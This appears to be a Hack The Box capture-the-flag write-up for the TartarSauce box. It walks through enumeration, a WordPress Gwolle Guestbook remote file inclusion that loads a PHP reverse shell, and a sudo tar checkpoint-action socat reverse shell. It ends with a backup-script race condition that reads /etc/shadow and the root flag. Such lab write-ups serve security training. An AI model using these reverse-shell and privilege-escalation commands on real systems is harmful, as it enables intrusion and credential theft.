Tags: hack the box, inotify, tar, python
This was a challenging box. It had a lot of places to get lost in the sauce (ba-dum tssss). I found myself crawling back out of rabbit holes more than once while working on Tartarsauce. The two authors, 3mrgnc3 & ihack4falafel, did an excellent job of putting together a box that felt like it was straight out of OSCP. Enumeration and avoiding time-sinks were the keys to success here.
As usual, we start off with a masscan
followed by a targeted nmap
.
masscan -e tun0 --ports U:0-65535,0-65535 --rate 700 -oL scan.10.10.10.88.all 10.10.10.88
#masscan
open tcp 80 10.10.10.88 1538755374
# end
nmap -sC -sV -oN nmap.scan -p 80 10.10.10.88
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page
nmap
returns a ton of juicy looking urls from robots.txt. Unfortunately, they were all rabbit holes.
The real entrypoint was easy to miss, unless you’re used to iteratively performing gobuster
on each directory found or use a recursive directory enumeration tool.
The first gobuster
scan showing /webservices (we also saw this in the nmap
scan).
gobuster -u 10.10.10.88 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e -t 20 -o "gobuster.10.10.10.88.out"
1http://10.10.10.88/.htaccess (Status: 403)
2http://10.10.10.88/.hta (Status: 403)
3http://10.10.10.88/.htpasswd (Status: 403)
4http://10.10.10.88/index.html (Status: 200)
5http://10.10.10.88/robots.txt (Status: 200)
6http://10.10.10.88/server-status (Status: 403)
7http://10.10.10.88/webservices (Status: 301)
The second gobuster
on the /webservices directory.
1http://10.10.10.88/webservices/.hta (Status: 403)
2http://10.10.10.88/webservices/.htaccess (Status: 403)
3http://10.10.10.88/webservices/.htpasswd (Status: 403)
4http://10.10.10.88/webservices/wp (Status: 301)
The final gobuster
on /webservices/wp directory. This is the one where we know we’re dealing with a WordPress install due to the directory structure (wp-content, wp-admin, etc…).
http://10.10.10.88/webservices/wp/.hta (Status: 403)
http://10.10.10.88/webservices/wp/.htaccess (Status: 403)
http://10.10.10.88/webservices/wp/.htpasswd (Status: 403)
http://10.10.10.88/webservices/wp/index.php (Status: 301)
http://10.10.10.88/webservices/wp/wp-admin (Status: 301)
http://10.10.10.88/webservices/wp/wp-content (Status: 301)
http://10.10.10.88/webservices/wp/wp-includes (Status: 301)
Knowing we’re dealing with a WordPress install, wpscan
immediately jumps to mind as it’s the standard for WordPress scanning tools.
wpscan -ep --url http://10.10.10.88/webservices/wp
wpscan options used:
--enumerate | -e [option(s)]
option :
p plugins
-------------8<-------------
[!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/9109
Reference: http://seclists.org/fulldisclosure/2018/Jul/89
Reference: http://www.defensecode.com/advisories/DC-2018-05-008_WordPress_Gwolle_Guestbook_Plugin_Advisory.pdf
Reference: https://plugins.trac.wordpress.org/changeset/1888023/gwolle-gb
-------------8<-------------
If you dig a bit into this plugin, the specific XSS vulnerability referenced isn’t what’s interesting. The interesting piece is outlined in the readme.txt included with the plugin, specifically, the changelog.
1== Changelog ==
2
3= 2.3.10 =
4* 2018-2-12
5* Changed version from 1.5.3 to 2.3.10 to trick wpscan ;D
6
7= 1.5.3 =
8* 2015-10-01
9* When email is disabled, save it anyway when user is logged in.
10* Add nb_NO (thanks Bjørn Inge Vårvik).
11* Update ru_RU.
Now that we know the real version is 1.5.3, the way forward becomes clear: WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion. According to the Exploit-DB entry, the abspath is being used in a PHP require()
function call. It is trying to include a remote file named wp-load.php. We can serve up our own version of that file for RCE.
We can use the php reverse shell hosted on pentestmonkey as our wp-load.php. We just need to modify two lines within the file to reflect our IP address and port and change the name of the file.
# Malicious wp-load.php
-------------8<-------------
$ip = '10.10.14.77'; // CHANGE THIS
$port = 12344; // CHANGE THIS
-------------8<-------------
Spin up a local web server on kali for the target to reach out to when searching for its wp-load.php. Also on kali, fire up a listener to catch the callback.
python3 -m http.server 80
-------------8<-------------
nc -nlvp 12344
The final step is to make the request using the vulnerable parameter.
http http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.77/
We serve up the php via python and receive our callback.
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.88 - - [05/Oct/2018 12:23:09] "GET /wp-load.php HTTP/1.0" 200 -
Ncat: Connection from 10.10.10.88:48860.
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
\o/ - access level: www-data
Basic enumeration steps showed that we are able to run the /bin/tar
command as the user onuma without a password via sudo
.
Matching Defaults entries for www-data on TartarSauce:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on TartarSauce:
(onuma) NOPASSWD: /bin/tar
We can elevate privileges with the tar
command below and grab a full tty shell while we’re at it by using a socat
callback as the argument to checkpoint-action.
Local on kali.
socat file:`tty`,echo=0,raw tcp4-listen:12323
On target.
sudo -u onuma /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec='/tmp/socat_x86 tcp-connect:10.10.14.2:12323 exec:"bash -li",pty,stderr,setsid,sigint,sane'
tar options used:
--checkpoint
display progress messages every NUMBERth record (default 10)
--checkpoint-action=ACTION
execute ACTION on each checkpoint
-------------8<-------------
the exec action executes a given external command
During re-enumeration as onuma, we notice that there is an interesting systemd service running.
/lib/systemd/system/backuperer.service
════════════════════════════
[Install]
WantedBy=multi-user.target
[Unit]
Description=Backuperer
[Service]
ExecStart=/usr/sbin/backuperer
There is also an associated timer.
/etc/systemd/system/multi-user.target.wants/backuperer.timer
════════════════════════════
[Unit]
Description=Runs backuperer every 5 mins
[Timer]
# Time to wait after booting before we run first time
OnBootSec=5min
# Time between running each consecutive time
OnUnitActiveSec=5min
Unit=backuperer.service
These two items together run the script below every 5 minutes as the root user.
The key take-aways from the script are highlighted. Essentially, there is a 30-second window between backing up /var/www/html and performing the integrity check with diff
. We’ll use that window of time to get root level read access to the filesystem.
1#!/bin/bash
2
3#-------------------------------------------------------------------------------------
4# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
5# ONUMA Dev auto backup program
6# This tool will keep our webapp backed up incase another skiddie defaces us again.
7# We will be able to quickly restore from a backup in seconds ;P
8#-------------------------------------------------------------------------------------
9
10# Set Vars Here
11basedir=/var/www/html
12bkpdir=/var/backups
13tmpdir=/var/tmp
14testmsg=$bkpdir/onuma_backup_test.txt
15errormsg=$bkpdir/onuma_backup_error.txt
16tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
17check=$tmpdir/check
18
19# formatting
20printbdr()
21{
22 for n in $(seq 72);
23 do /usr/bin/printf $"-";
24 done
25}
26bdr=$(printbdr)
27
28# Added a test file to let us see when the last backup was run
29/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
30
31# Cleanup from last time.
32/bin/rm -rf $tmpdir/.* $check
33
34# Backup onuma website dev files.
35/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
36
37# Added delay to wait for backup to complete if large files get added.
38/bin/sleep 30
39
40# Test the backup integrity
41integrity_chk()
42{
43 /usr/bin/diff -r $basedir $check$basedir
44}
45
46/bin/mkdir $check
47/bin/tar -zxvf $tmpfile -C $check
48if [[ $(integrity_chk) ]]
49then
50 # Report errors so the dev can investigate the issue.
51 /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
52 integrity_chk >> $errormsg
53 exit 2
54else
55 # Clean up and save archive to the bkpdir.
56 /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
57 /bin/rm -rf $check .*
58 exit 0
59fi
Quick analysis of the code:
Because we are onuma, we can alter the tarball created by the script. The contents of /var/www/html never change, but we can change the contents of the tarball. If any files are different between the two folders, the differences will be captured in the error log.
Steps to exploit the race condition introduced in the code above:
backuperer
to diff
what the file should be with what our link points toNow that we have a way ahead, let’s put our analysis into action.
There are a lot of ways to be able to determine when the tarball is alive and available for manipulation. pspy and a process watcher script come to mind and are much simpler solutions than what I outline below. I’ve been waiting for an excuse to play with inotify and this was a perfect opportunity.
I wanted to write a program that used inotify to trigger reactions when backuperer
ran. pspy
uses inotify under the hood as well, which is really got me interested in playing with inotify in the first place. I chose to use pyinotify and python instead of using C.
The general steps to the script are what is laid out above. Additionally, I wanted to implement a few nice-to-haves as well.
As I previously mentioned, the key feature that I wanted to play with while writing this script was inotifiy. The pyinotify module makes handling events really simple.
The basic premise is that you create watches and add them to a watch list. Each item (“watch”) in the watch list specifies the pathname of a file or directory, along with some set of events that the kernel should monitor for the file referred to by that pathname.
When events occur for monitored files and directories, those events are made available to the application as structured data.
For my script, I set two watches detailed below.
The first watch used IN_CLOSE_WRITE on /var/tmp
. The IN_CLOSE_WRITE event is triggered when a file that was opened for writing is closed.
The code below creates the WatchManager and adds a watch that handles events produced when a file with /var/tmp
that was opened for writing is closed.
wm = pyinotify.WatchManager()
wm.add_watch('/var/tmp', pyinotify.IN_CLOSE_WRITE)
That done, we define an event handler and register a callback that will execute each time a file that was opened for writing is closed within /var/tmp. We use IN_CLOSE_WRITE because we want the entire tarball to be complete before we do anything with the script. pyinotify uses the naming convention of process_EVENT_NAME within their EventHandler class to know which callback function to call when an event occurs.
class EventHandler(pyinotify.ProcessEvent):
def __init__(self, *args, **kwargs):
# -------------8<-------------
def process_IN_CLOSE_WRITE(self, event: pyinotify.Event) -> None:
# This function is designed to trigger on the creation of the tarball generated by /usr/sbin/backuperer
# -------------8<-------------
def process_IN_MODIFY(self, event: pyinotify.Event) -> None:
# This function is designed to trigger when /var/backups/onuma_backup_error.txt is appended to
# -------------8<-------------
handler = EventHandler(...)
notifier = pyinotify.Notifier(wm, handler)
notifier.loop()
The second watch used IN_MODIFY on /var/backups/onuma_backup_error.txt
. The IN_MODIFY event is triggered when a file is modified.
The code below adds another watch to the WatchManager that handles events produced when the error log is modified, i.e. after the diff
happens and output is appened to the error log.
wm.add_watch('/var/backups/onuma_backup_error.txt', pyinotify.IN_MODIFY) # for reading error_log
The additional watch works in concert with the EventHandler class above. With callbacks registered to watch for events triggered by the backuperer service, the next step is to package everything up and get it to target.
To deploy the script with its dependencies, I chose to use the zipapp module. This module provides tools to manage the creation of zip files containing Python code, which can be executed directly by the Python interpreter.
If you’ve never heard of or played with this module, it’s pretty baller. It isn’t a solution for all dependency problems, but for simple cases, it can be incredibly useful. To magic the script and pyinotify into a single executable zip, all that’s needed is the following:
pip install PACKAGE --target DIR
You can try it out for yourself by using the commands below.
git clone https://github.com/epi052/htb-scripts-for-retired-boxes.git
cd htb-scripts-for-retired-boxes/tartarsauce
python3 -m pip install pyinotify --target triggered
python3 -m zipapp -p "/usr/bin/env python3" triggered
After running the commands above, you should have a triggered.pyz file sitting in your current working directory. If you run file
on it, you can see it’s a labeled as a zip archive.
NOTE: I had to do the following on my kali box to get pip3
installed, YMMV
wget https://bootstrap.pypa.io/get-pip.py
python3.6 get-pip.py
For the sake of brevity, I didn’t include the entire script here. You can find it here. I commented it well enough that it’s hopefully easy to follow. I plan to start including non-trivial HTB soltuion-related scripts in that repo (smasher comes to mind).
Here is a sample run of the script against a few files.
./triggered.pyz /var/tmp --to_read /root/root.txt /var/backups/gshadow.bak /var/backups/shadow.bak /var/backups/passwd.bak /var/backups/group.bak /etc/shadow /etc/gshadow
[+] Files to read:
[-] /root/root.txt
[-] /var/backups/gshadow.bak
[-] /var/backups/shadow.bak
[-] /var/backups/passwd.bak
[-] /var/backups/group.bak
[-] /etc/shadow
[-] /etc/gshadow
[+] Tarball created by /usr/sbin/backuperer
[-] /var/tmp/.44cc41ae53ccc6377078968afb1ac80741cf94a8
[+] Files from /var/tmp/.44cc41ae53ccc6377078968afb1ac80741cf94a8 extracted
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/wp-mail.php
[-] Linking /tmp/var/www/html/webservices/wp/wp-mail.php to /root/root.txt
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/wp-links-opml.php
[-] Linking /tmp/var/www/html/webservices/wp/wp-links-opml.php to /var/backups/gshadow.bak
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/wp-comments-post.php
[-] Linking /tmp/var/www/html/webservices/wp/wp-comments-post.php to /var/backups/shadow.bak
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/.htaccess
[-] Linking /tmp/var/www/html/webservices/wp/.htaccess to /var/backups/passwd.bak
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/wp-trackback.php
[-] Linking /tmp/var/www/html/webservices/wp/wp-trackback.php to /var/backups/group.bak
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/xmlrpc.php
[-] Linking /tmp/var/www/html/webservices/wp/xmlrpc.php to /etc/shadow
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/wp-cron.php
[-] Linking /tmp/var/www/html/webservices/wp/wp-cron.php to /etc/gshadow
[-] All files to be read are linked.
[+] Tarring up the altered backup.
[-] Tarball /var/tmp/.44cc41ae53ccc6377078968afb1ac80741cf94a8 created.
[+] Error log modified, checking results.
[+] /var/backups/passwd.bak
root:x:0:0:root:/root:/bin/bash
-------------8<-------------
onuma:x:1000:1000:,,,:/home/onuma:/bin/bash
[+] /var/backups/shadow.bak
root:$6$AKRzYZby$Q88P1RTNm6Ho39GencM8qFL8hkhF0GmIhYAdxlIuHVv50BTTXvIH2rzgWOCkZOQDSuWo6gWQ2gXoePj8Rwthm0:17582:0:99999:7:::
-------------8<-------------
onuma:$6$P9azUgRM$U9lw7gpIvIVv1UK9zzzakd9mVwNeusjtWvYfHpS5qcMqLqoa9O3c1iARol1h7Aa8Tqroif.jtKxrLX5XOf/9c0:17571:0:99999:7:::
[+] /etc/gshadow
root:*::
-------------8<-------------
[+] /var/backups/gshadow.bak
root:*::
-------------8<-------------
[+] /root/root.txt
e79...
[+] /var/backups/group.bak
root:x:0:
-------------8<-------------
[+] /etc/shadow
root:$6$AKRzYZby$Q88P1RTNm6Ho39GencM8qFL8hkhF0GmIhYAdxlIuHVv50BTTXvIH2rzgWOCkZOQDSuWo6gWQ2gXoePj8Rwthm0:17582:0:99999:7:::
-------------8<-------------
onuma:$6$P9azUgRM$U9lw7gpIvIVv1UK9zzzakd9mVwNeusjtWvYfHpS5qcMqLqoa9O3c1iARol1h7Aa8Tqroif.jtKxrLX5XOf/9c0:17571:0:99999:7:::
As you can see, it can grab any root owned file, including root.txt. I had a lot of fun working on the box and finally squirreling out and writing the script to automate the root read access.
\o/ - root read access
I hope you enjoyed this write-up, or at least found something useful. Drop me a line on the HTB forums or in chat @ NetSec Focus.